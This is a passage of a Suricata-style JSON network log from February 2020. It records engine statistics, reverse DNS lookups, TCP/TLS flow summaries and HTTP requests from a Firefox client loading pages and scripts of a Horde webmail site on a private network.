"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2842,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":1,"flows_timeout":6,"flows_timeout_inuse":5,"flows_removed":1,"rows_checked
":65536,"rows_skipped":65527,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":18522,"memcap":0}}} {"timestamp":"2020-02-29T00:23:02.069259+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37424,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45637,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:03.000165+0000","flow_id":2218856049239313,"event_type":"flow","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":4261,"bytes_toclient":25370,"start":"2020-02-29T00:21:51.877841+0000","end":"2020-02-29T00:22:01.788265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:03.006537+0000","flow_id":1839442932834932,"event_type":"flow","src_ip":"192.168.10.130","src_port":34234,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":26,"pkts_toclient":31,"bytes_toserver":3724,"bytes_toclient":32279,"start":"2020-02-29T00:21:44.434804+0000","end":"2020-02-29T00:21:49.758600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006701+0000","flow_id":867577733854192,"event_type":"flow","src_ip":"192.168.10.130","src_port":34256,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":117,"bytes_toserver":14695,"bytes_toclient":147060,"start":"2020-02-29T00:21:56.734192+0000","end":"2020-02-29T00:22:01.972112+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006862+0000","flow_id":2142770703138942,"event_type":"flow","src_ip":"192.168.10.130","src_port":34232,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":98,"pkts_toclient":146,"bytes_toserver":13683,"bytes_toclient":191039,"start":"2020-02-29T00:21:44.426110+0000","end":"2020-02-29T00:21:49.809005+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:03.006962+0000","flow_id":2145609676489439,"event_type":"flow","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":80,"pkts_toclient":124,"bytes_toserver":9977,"bytes_toclient":163566,"start":"2020-02-29T00:21:44.197343+0000","end":"2020-02-29T00:21:50.074452+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007088+0000","flow_id":1040213943538856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34230,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":23,"pkts_toclient":27,"bytes_toserver":4419,"bytes_toclient":23565,"start":"2020-02-29T00:21:44.349352+0000","end":"2020-02-29T00:21:49.759472+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007163+0000","flow_id":948151319534199,"event_type":"flow","src_ip":"192.168.10.130","src_port":34240,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":63,"bytes_toserver":5995,"bytes_toclient":76626,"start":"2020-02-29T00:21:44.727671+0000","end":"2020-02-29T00:21:49.811419+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:03.007244+0000","flow_id":823107642465495,"event_type":"flow","src_ip":"192.168.10.130","src_port":34260,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":4488,"start":"2020-02-29T00:21:56.924887+0000","end":"2020-02-29T00:22:01.968024+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007349+0000","flow_id":832002519790009,"event_type":"flow","src_ip":"192.168.10.130","src_port":34258,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":31,"pkts_toclient":40,"bytes_toserver":10242,"bytes_toclient":41891,"start":"2020-02-29T00:21:56.913849+0000","end":"2020-02-29T00:22:01.971946+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:04.004628+0000","flow_id":1572605190170049,"event_type":"flow","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:03.353729+0000","end":"2020-02-29T00:18:03.458627+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:23:07.000630+0000","flow_id":2079140748366751,"event_type":"flow","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:06.824223+0000","end":"2020-02-29T00:18:06.932681+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:08.000776+0000","flow_id":362352125925699,"event_type":"flow","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:07.317763+0000","end":"2020-02-29T00:18:07.426181+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:10.000240+0000","event_type":"stats","stats":{"uptime":15042,"capture":{"kernel_packets":139790,"kernel_drops":0},"decoder":{"pkts":139884,"bytes":96036227,"invalid":195,"ipv4":138317,"ipv6":10,"ethernet":139884,"raw":0,"null":0,"sll":0,"tcp":132773,"udp":5334,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2875,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2891,"synack":2882,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"ap
p_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2440,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2522}},"flow_mgr":{"closed_pruned":2851,"new_pruned":17,"est_pruned":2501,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17849,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:23:10.326117+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48534,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:10.599487+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093}} {"timestamp":"2020-02-29T00:23:11.007440+0000","flow_id":1461949668569849,"event_type":"flow","src_ip":"192.168.10.130","src_port":34266,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1238,"bytes_toclient":653,"start":"2020-02-29T00:22:04.111353+0000","end":"2020-02-29T00:22:09.117658+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:11.007734+0000","flow_id":1370887756629374,"event_type":"flow","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:10.771454+0000","end":"2020-02-29T00:18:10.880127+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:11.007855+0000","flow_id":545279093472280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34262,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":140,"bytes_toserver":10673,"bytes_toclient":185900,"start":"2020-02-29T00:22:03.949272+0000","end":"2020-02-29T00:22:09.400447+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:12.000169+0000","flow_id":1665067602402,"event_type":"flow","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.152034+0000","end":"2020-02-29T00:18:11.260439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:12.000581+0000","flow_id":807637155517539,"event_type":"flow","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.398435+0000","end":"2020-02-29T00:18:11.506897+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:13.290183+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.300862+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41517,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43331,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:13.520499+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:23:13.538122+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} 
{"timestamp":"2020-02-29T00:23:13.547702+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:23:13.550207+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.550601+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} 
{"timestamp":"2020-02-29T00:23:13.557270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:23:13.557697+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.559538+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.559949+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:23:13.562336+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:23:13.563141+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":1}} {"timestamp":"2020-02-29T00:23:13.566870+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:23:13.563707+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:23:13.569736+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:23:13.571705+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.572319+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:23:13.574621+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.574974+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:23:13.577326+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 